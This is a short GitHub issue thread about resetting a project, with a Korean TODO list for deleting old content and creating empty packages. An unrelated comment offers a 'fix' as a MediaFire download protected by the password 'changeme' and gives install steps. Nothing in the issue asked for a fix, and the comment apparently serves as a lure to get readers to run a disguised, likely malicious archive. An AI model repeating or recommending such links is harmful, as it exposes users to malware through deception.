### ISSUE TITLE
Documentation: 프로젝트 초기화

### ISSUE THREAD

**Issue by JEESW** [high-five-ormi/Algoy-AI#24]
## TODO
  - [x] 프로젝트 내용 수정에 따른 기존 내용 삭제
  - [x] 빈 패키지 구조 생성

## 설명
프로젝트 내용 수정에 따른 프로젝트 초기화

**Comment by FoioMikael** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
